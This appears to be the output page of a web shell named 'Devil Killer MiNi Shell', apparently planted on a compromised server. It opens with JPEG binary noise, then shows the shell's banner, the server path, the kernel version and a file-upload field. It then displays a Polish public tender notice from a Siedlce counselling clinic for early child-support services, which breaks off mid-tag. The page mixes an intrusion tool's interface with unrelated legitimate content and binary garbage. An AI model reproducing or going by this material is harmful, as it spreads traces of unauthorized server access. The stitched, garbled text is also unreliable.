JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250123/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250123/0006053501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Program kompleksowego wsparcia dla rodzin „Za życiem” - zadanie 2.4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PORADNIA PSYCHOLOGICZNO - PEDAGOGICZNA W SIEDLCACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711563891</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krystyny Osińskiej 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@poradnia.siedlce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.poradnia.siedlce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Program kompleksowego wsparcia dla rodzin „Za życiem” - zadanie 2.4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c08417c-5e7a-4af7-b592-e3bdbb07a323</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00060535</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00676869/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Program kompleksowego wsparcia dla rodzin „Za życiem” - zadanie 2.4</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miasto-siedlce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miasto-siedlce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf..<br/>2. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,<br/>odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>3. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>otwarcia ofert.<br/>2) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.<br/>4. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>1) .zip<br/>2) .7Z<br/>6. W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego:<br/>1) ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w<br/>formacie PAdES.<br/>2) pliki w innych formatach niż PDF zaleca się opatrzyć podpisem w formacie XAdES o typie zewnętrznym. W związku z tym<br/>Wykonawca będzie zobowiązany załączyć oprócz podpisanego dokumentu oddzielny plik z podpisem.<br/>Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej znajdują się w Rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem 27 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem 27 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPP.241.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>pedagoga, w tym 22 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań pedagoga należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>pedagoga, w tym 12 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań pedagoga należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 3 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>logopedę, w tym 15 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań logopedy należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz<br/>OpiPrzedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 